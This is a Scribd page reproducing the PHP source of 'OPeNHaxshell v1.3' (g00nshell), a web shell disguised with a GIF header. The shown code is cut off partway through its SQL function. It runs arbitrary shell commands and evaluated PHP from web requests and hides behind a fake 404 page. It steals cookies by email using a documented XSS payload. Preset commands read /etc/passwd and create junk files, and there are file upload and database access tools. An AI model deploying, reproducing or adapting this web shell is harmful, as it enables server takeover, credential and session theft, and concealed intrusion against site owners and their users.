Scribd Logo
Загрузить

Добро пожаловать в Scribd!

  • Code Source Final OPeNHaxshell v1.3

    Загружено:

    Rassoul SOW
    30 просмотров12 страниц

    Оригинальное название

    Code source final OPeNHaxshell v1.3

    Авторское право

    © © All Rights Reserved

    Доступные форматы

    RTF, PDF, TXT или читайте онлайн в Scribd

    Этот документ был вам полезен?

    Это неприемлемый материал?

    Пожаловаться на этот документ

    Авторское право:

    © All Rights Reserved
    Скачайте в формате RTF, PDF, TXT или читайте онлайн в Scribd
    Отметить как неприемлемый контент
    30 просмотров12 страниц

    Code Source Final OPeNHaxshell v1.3

    Загружено:

    Rassoul SOW

    Авторское право:

    © All Rights Reserved
    Скачайте в формате RTF, PDF, TXT или читайте онлайн в Scribd
    Отметить как неприемлемый контент
    из 12

    1 GIF89;a

    2 666
    3 <?php
    4 /*
    5
    6 ###
    7 ###
    8 ###
    9 ###
    10 ###
    11 ###
    12 ###
    13 ###
    14 ###
    15 ###
    16 ###
    17 ###
    18 ###
    19 ###
    20 ###
    21 ###
    22 ###
    23 ###
    24 ###
    25 ###
    26 ###
    27 ###
    28 ###
    29 ###
    30 ###
    31 ###
    32 ###
    33 ###
    34 ###
    35 ###
    36 ###
    37 ###
    38 ###
    39 ###
    40 ###
    41 # [OPeNHax]Tn presents: #
    42 # OPeNHaxshell v1.3 final #
    43
    44 ###
    45 ###
    46 ###
    47 ###
    48 ###
    49 ###
    50 ###
    51 ###
    52 ###
    53 ###
    54 ###
    55 ###
    56 ###
    57 ###DOCUMENTATION
    58 ###
    59 ###
    60 ###
    61 ###
    62 ###
    63 ###
    64 ###
    65 ###
    66 ###
    67 ###
    68 ###
    69 ###
    70 ###
    71 ####
    72 #To execute commands, simply include ?cmd=___ in the url. #
    73 #Ex: http://site.com/shl.php?cmd=whoami #
    74 # #
    75 #To steal cookies, use ?cookie=___ in the url. #
    76 #Ex: <script>document.location.href= #
    77 #'http://site.com/shl.php?cookie='+document.cookies</script> #
    78
    79 ###
    80 ###
    81 ###
    82 ###
    83 ###
    84 ###
    85 ###
    86 ###
    87 ###
    88 ###
    89 ###
    90 ###
    91 ###VERIFICATION LEVELS
    92 ###
    93 ###
    94 ###
    95 ###
    96 ###
    97 ###
    98 ###
    99 ###
    100 ###
    101 ###
    102 ###
    103 ####
    104 #0: No protection; anyone can access #
    105 #1: User-Agent required #
    106 #2: Require IP #
    107 #3: Basic Authentication #
    108
    109 ###
    110 ###
    111 ###
    112 ###
    113 ###
    114 ###
    115 ###
    116 ###
    117 ###
    118 ###
    119 ###
    120 ###
    121 ###
    122 ###
    123 ###KNOWN BUGS
    124 ###
    125 ###
    126 ###
    127 ###
    128 ###
    129 ###
    130 ###
    131 ###
    132 ###
    133 ###
    134 ###
    135 ###
    136 ###
    137 ###
    138 ###
    139 #Windows directory handling #
    140 # #
    141 #The SQL tool is NOT complete. There is currently no editing function#
    142 #available. Some time in the future this may be fixed, but for now #
    143 #don't complain to me about it #
    144
    145 ###
    146 ###
    147 ###
    148 ###
    149 ###
    150 ###
    151 ###
    152 ###
    153 ###
    154 ###
    155 ###
    156 ###
    157 ###
    158 ###
    159 ###
    160 ###SHOUTS
    161 ###
    162 ###
    163 ###
    164 ###
    165 ###
    166 ###
    167 ###
    168 ###
    169 ###
    170 ###
    171 ###
    172 ###
    173 ###
    174 ###
    175 ###
    176 ###
    177 #pr0be - Beta testing & CSS #
    178 #TrinTiTTY - Beta testing #
    179 #clorox - Beta testing #
    180 #Everyone else at g00ns.net #
    181
    182 ###
    183 ###
    184 ###
    185 ###
    186 ###
    187 ###
    188 ###
    189 ###
    190 ###
    191 ###
    192 ###
    193 ###NOTE TO ADMINISTRATORS
    194 ###
    195 ###
    196 ###
    197 ###
    198 ###
    199 ###
    200 ###
    201 ###
    202 ###
    203 ###
    204 ###
    205 ###
    206 #If this script has been found on your server without your approval, #
    207 #it would probably be wise to delete it and check your logs. #
    208
    209 ###
    210 ###
    211 ###
    212 ###
    213 ###
    214 ###
    215 ###
    216 ###
    217 ###
    218 ###
    219 ###
    220 ###
    221 ###
    222 ###
    223 ###
    224 ###
    225 ###
    226 ###
    227 ###
    228 ###
    229 ###
    230 ###
    231 ###
    232 ###
    233 ###
    234 ###
    235 ###
    236 ###
    237 ###
    238 ###
    239 ###
    240 ###
    241 ###
    242 ###
    243 ###
    244 */
    245 // Configuration
    246 $auth = 0;
    247 $uakey = "b5c3d0b28619de70bf5588505f4061f2"; // MD5 encoded user-agent
    248 $IP = array("127.0.0.2","127.0.0.1"); // IP Addresses allowed to access shell
    249 $email = ""; // E-mail address where cookies will be sent
    250 $user = "af1035a85447f5aa9d21570d884b723a"; // MD5 encoded User
    251 $pass = "47e331d2b8d07465515c50cb0fad1e5a"; // MD5 encoded Password
    252 // Global Variables
    253 $version = "1.3 final";
    254 $self = $_SERVER['PHP_SELF'];
    255 $soft = $_SERVER["SERVER_SOFTWARE"];
    256 $servinf = split("[:]", getenv('HTTP_HOST'));
    257 $servip = $servinf[0];
    258 $servport = $servinf[1];
    259 $uname = php_uname();
    260 $curuser = @exec('whoami');
    261 $cmd = $_GET['cmd'];
    262 $act = $_GET['act'];
    263 $cmd = $_GET['cmd'];
    264 $cookie = $_GET['cookie'];
    265 $f = $_GET['f'];
    266 $curdir = cleandir(getcwd());
    267 if(!$dir){$dir = $_GET['dir'];}
    268 elseif($dir && $_SESSION['dir']){$dir = $_SESSION['dir'];}
    269 elseif($dir && $_SESSION['dir']){$dir = $curdir;}
    270 if($dir && $dir != "nullz"){$dir = cleandir($dir);}
    271 $contents = $_POST['contents'];
    272 $gf = $_POST['gf'];
    273 $img = $_GET['img'];
    274 session_start();
    275 @set_time_limit(5);
    276 switch($auth){ // Authentication switcher
    277 case 0: break;
    278 case 1: if(md5($_SERVER['HTTP_USER_AGENT']) != $uakey){hide();}
    break;
    279 case 2: if(!in_array($_SERVER['REMOTE_ADDR'],$IP)){hide();} break;
    280 case 3: if(!$_SERVER["PHP_AUTH_USER"]){userauth();} break;
    281 }
    282
    283 function userauth(){ // Basic authentication function
    284 global $user, $pass;
    285 header("WWW-Authenticate: Basic realm='Secure Area'");
    286 if(md5($_SERVER["PHP_AUTH_USER"]) != $user ||
    md5($_SERVER["PHP_AUTH_PW"] != $pass)){
    287 hide();
    288 die();
    289 }
    290 }
    291 if(!$act && !$cmd && !$cookie && !$f && !$dir && !$gf && !$img){main();}
    292 elseif(!$act && $cmd){
    293 style();
    294 echo("<b>Results:</b>\n<br><textarea rows=20 cols=100>");
    295 $cmd = exec($cmd, $result);
    296 foreach($result as $line){echo($line . "\n");}
    297 echo("</textarea>");
    298 }
    299 elseif($cookie){@mail("$email", "Cookie Data", "$cookie", "From: $email");
    hide();} // Cookie stealer function
    300 elseif($act == "view" && $f && $dir){view($f, $dir);}
    301 elseif($img){img($img);}
    302 elseif($gf){grab($gf);}
    303 elseif($dir){files($dir);}
    304 else{
    305 switch($act){
    306 case "phpinfo": phpinfo();break;
    307 case "sql": sql();break;
    308 case "files": files($dir);break;
    309 case "email": email();break;
    310 case "cmd": cmd();break;
    311 case "upload": upload();break;
    312 case "tools": tools();break;
    313 case "sqllogin": sqllogin();break;
    314 case "sql": sql();break;
    315 case "lookup": lookup();break;
    316 case "kill": kill();break;
    317 case "phpexec": execphp();break;
    318 default: main();break;
    319 }
    320 }
    321 function cleandir($d){ // Function to clean up the $dir and $curdir variables
    322 $d = realpath($d);
    323 $d = str_replace("\\\\", "//", $d);
    324 $d = str_replace("////", "//", $d);
    325 $d = str_replace("\\", "/", $d);
    326 return($d);
    327 }
    328 function hide(){ // Hiding function
    329 global $self, $soft, $servip, $servport;
    330 die("<!DOCTYPE HTML PUBLIC '-//IETF//DTD HTML 2.0//EN'>
    331 <HTML><HEAD>
    332 <TITLE>404 Not Found</TITLE>
    333 </HEAD><BODY>
    334 <H1>Not Found</H1>
    335 The requested URL $self was not found on this server.<P>
    336 <P>Additionally, a 404 Not Found
    337 error was encountered while trying to use an ErrorDocument to handle the
    request.
    338 <HR>
    339 <ADDRESS>$soft Server at $servip Port $servport</ADDRESS>
    340 </BODY></HTML>");
    341 }
    342 function style(){ // Style / header function
    343 global $servip,$version;
    344 echo("<html>\n
    345 <head>\n
    346 <title>g00nshell v" . $version . " - " . $servip . "</title>\n
    347 <style>\n
    348 body { background-color:#000000; color:white; font-family:Verdana; font-
    size:11px; }\n
    349 h1 { color:white; font-family:Verdana; font-size:11px; }\n
    350 h3 { color:white; font-family:Verdana; font-size:11px; }\n
    351 input,textarea,select { color:#FFFFFF; background-color:#2F2F2F; border:1px
    solid #4F4F4F; font-family:Verdana; font-size:11px; }\n
    352 textarea { font-family:Courier; font-size:11px; }\n
    353 a { color:#6F6F6F; text-decoration:none; font-family:Verdana; font-
    size:11px; }\n
    354 a:hover { color:#7F7F7F; }\n
    355 td,th { font-size:12px; vertical-align:middle; }\n
    356 th { font-size:13px; }\n
    357 table { empty-cells:show;}\n
    358 .inf { color:#7F7F7F; }\n
    359 </style>\n
    360 </head>\n");
    361 }
    362 function main(){ // Main/menu function
    363 global $self, $servip, $servport, $uname, $soft, $banner, $curuser, $version;
    364 style();
    365 $act = array('cmd'=>'Command Execute','files'=>'File View','phpinfo'=>'PHP
    info', 'phpexec'=>'PHP Execute',
    366 'tools'=>'Tools','sqllogin'=>'SQL','email'=>'Email','upload'=>'Get
    Files','lookup'=>'List Domains','bshell'=>'Bindshell','kill'=>'Kill Shell');
    367 $capt = array_flip($act);
    368 echo("<form method='GET' name='shell'>");
    369 echo("<b>Host:</b> <span class='inf'>" . $servip . "</span><br>");
    370 echo("<b>Server software:</b> <span class='inf'>" . $soft . "</span><br>");
    371 echo("<b>Uname:</b> <span class='inf'>" . $uname . "</span><br>");
    372 echo("<b>Shell Directory:</b> <span class='inf'>" . getcwd() . "</span><br>");
    373 echo("<div style='display:none' id='info'>");
    374 echo("<b>Current User:</b> <span class='inf'>" . $curuser . "</span><br>");
    375 echo("<b>ID:</b> <span class='inf'>" . @exec('id') . "</span><br>");
    376 if(@ini_get('safe_mode') != ""){echo("<b>Safemode:</b> <font
    color='red'>ON</font>");}
    377 else{echo("<b>Safemode:</b> <font color='green'>OFF</font>");}
    378 echo("\n<br>\n");
    379 if(@ini_get('open_basedir') != ""){echo("<b>Open Base Dir:</b> <font
    color='red'>ON</font> [ <span class='inf'>" . ini_get('open_basedir') . "</span> ]");}
    380 else{echo("<b>Open Base Dir:</b> <font color='green'>OFF</font>");}
    381 echo("\n<br>\n");
    382 if(@ini_get('disable_functions') != ""){echo("<b>Disabled functions:</b> " .
    @ini_get('disable_functions'));}
    383 else{echo("<b>Disabled functions:</b> None");}
    384 echo("\n<br>\n");
    385 if(@function_exists(mysql_connect)){echo("<b>MySQL:</b> <font
    color='green'>ON</font>");}
    386 else{echo("<b>MySQL:</b> <font color='red'>OFF</font>");}
    387 echo("</div>");
    388 echo("[ <a href='#hax' onClick=\"document.getElementById('info').style.display
    = 'block';\">More</a> ] ");
    389 echo("[ <a href='#hax' onClick=\"document.getElementById('info').style.display
    = 'none';\">Less</a> ]");
    390 echo("<center>");
    391 echo("<h3 align='center'>Links</h3>");
    392 if($_SERVER['QUERY_STRING']){foreach($act as $link){echo("[ <a
    href='?" . $_SERVER['QUERY_STRING'] . "&act=" . $capt[$link] . "'
    target='frm'>" . $link . "</a> ] ");}}
    393 else{foreach($act as $link){echo("[ <a href='?act=" . $capt[$link] . "'
    target='frm'>" . $link . "</a> ] ");}}
    394 echo("</center>");
    395 echo("<hr>");
    396 echo("<br><iframe name='frm' style='width:100%; height:65%; border:0;' src='?
    act=files'></iframe>");
    397 echo("<pre style='text-align:center'>:: g00nshell <font color='red'>v" . $version .
    "</font> ::</pre>");
    398 die();
    399 }
    400 function cmd(){ // Command execution function
    401 style();
    402 echo("<form name='CMD' method='POST'>");
    403 echo("<b>Command:</b><br>");
    404 echo("<input name='cmd' type='text' size='50'> ");
    405 echo("<select name='precmd'>");
    406 $precmd = array(''=>'','Read /etc/passwd'=>'cat /etc/passwd','Open
    ports'=>'netstat -an',
    407 'Running Processes'=>'ps -aux', 'Uname'=>'uname -a', 'Get UID'=>'id',
    408 'Create Junkfile (/tmp/z)'=>'dd if=/dev/zero of=/tmp/z bs=1M
    count=1024',
    409 'Find passwd files'=>'find / -type f -name passwd');
    410 $capt = array_flip($precmd);
    411 foreach($precmd as $c){echo("<option value='" . $c . "'>" . $capt[$c] . "\n");}
    412 echo("</select><br>\n");
    413 echo("<input type='submit' value='Execute'>\n");
    414 echo("</form>\n");
    415 if($_POST['cmd'] != ""){$x = $_POST['cmd'];}
    416 elseif($_POST['precmd'] != ""){$x = $_POST['precmd'];}
    417 else{die();}
    418 echo("Results: <br><textarea rows=20 cols=100>");
    419 $cmd = @exec($x, $result);
    420 foreach($result as $line){echo($line . "\n");}
    421 echo("</textarea>");
    422 }
    423 function execphp(){ // PHP code execution function
    424 style();
    425 echo("<h4>Execute PHP Code</h4>");
    426 echo("<form method='POST'>");
    427 echo("<textarea name='phpexec' rows=5 cols=100>");
    428 if(!$_POST['phpexec']){echo("/*Don't include <? ?> tags*/\n");}
    429 echo(htmlentities($_POST['phpexec']) . "</textarea>\n<br>\n");
    430 echo("<input type='submit' value='Execute'>");
    431 echo("</form>");
    432 if($_POST['phpexec']){
    433 echo("<textarea rows=10 cols=100>");
    434 eval(stripslashes($_POST['phpexec']));
    435 echo("</textarea>");
    436 }
    437 }
    438 function sqllogin(){ // MySQL login function
    439 session_start();
    440 if($_SESSION['isloggedin'] == "true"){
    441 header("Location: ?act=sql");
    442 }
    443 style();
    444 echo("<form method='post' action='?act=sql'>");
    445 echo("User:<br><input type='text' name='un' size='30'><br>\n");
    446 echo("Password:<br><input type='text' name='pw' size='30'><br>\n");
    447 echo("Host:<br><input type='text' name='host' size='30'
    value='localhost'><br>\n");
    448 echo("Port:<br><input type='text' name='port' size='30' value='3306'><br>\n");
    449 echo("<input type='submit' value='Login'>");
    450 echo("</form>");
    451 die();
    452 }
    453 function sql(){ // General SQL Function
    454 session_start();
    455 if(!$_GET['sqlf']){style();}
    456 if($_POST['un'] && $_POST['pw']){;
    457 $_SESSION['sql_user'] = $_POST['un'];
    458 $_SESSION['sql_password'] = $_POST['pw'];
    459 }
    460 if($_POST['host']){$_SESSION['sql_host'] = $_POST['host'];}
    461 else{$_SESSION['sql_host'] = 'localhost';}
    462 if($_POST['port']){$_SESSION['sql_port'] = $_POST['port'];}
    463 else{$_SESSION['sql_port'] = '3306';}
    464 if($_SESSION['sql_user'] && $_SESSION['sql_password']){
    465 if(!($sqlcon = @mysql_connect($_SESSION['sql_host'] . ':' .
    $_SESSION['sql_port'], $_SESSION['sql_user'], $_SESSION['sql_password']))){
    466 unset($_SESSION['sql_user'], $_SESSION['sql_password'],
    $_SESSION['sql_host'], $_SESSION['sql_port']);
    467 echo("Invalid credentials<br>\n");
    468 die(sqllogin());
    469 }
    470 else{
    471 $_SESSION['isloggedin'] = "true";
    472 }
    473 }
    474 else{
    475 die(sqllogin());
    476 }
    477 if ($_GET['db']){
    478 mysql_select_db($_GET['db'], $sqlcon);
    479 if($_GET['sqlquery']){
    480 $dat = mysql_query($_GET['sqlquery'], $sqlcon) or die(mysql_error());
    481 $num = mysql_num_rows($dat);
    482 for($i=0;$i<$num;$i++){
    483 echo(mysql_result($dat, $i) . "<br>\n");
    484 }
    485 }
    486 else if($_GET['table'] && !$_GET['sqlf']){
    487 echo("<a href='?act=sql&db=" . $_GET['db'] . "&table=" . $_GET['table'] .
    "&sqlf=ins'>Insert Row</a><br><br>\n");
    488 echo("<table border='1'>");
    489 $query = "SHOW COLUMNS FROM " . $_GET['table'];
    490 $result = mysql_query($query, $sqlcon) or die(mysql_error());
    491 $i = 0;

    Вам также может понравиться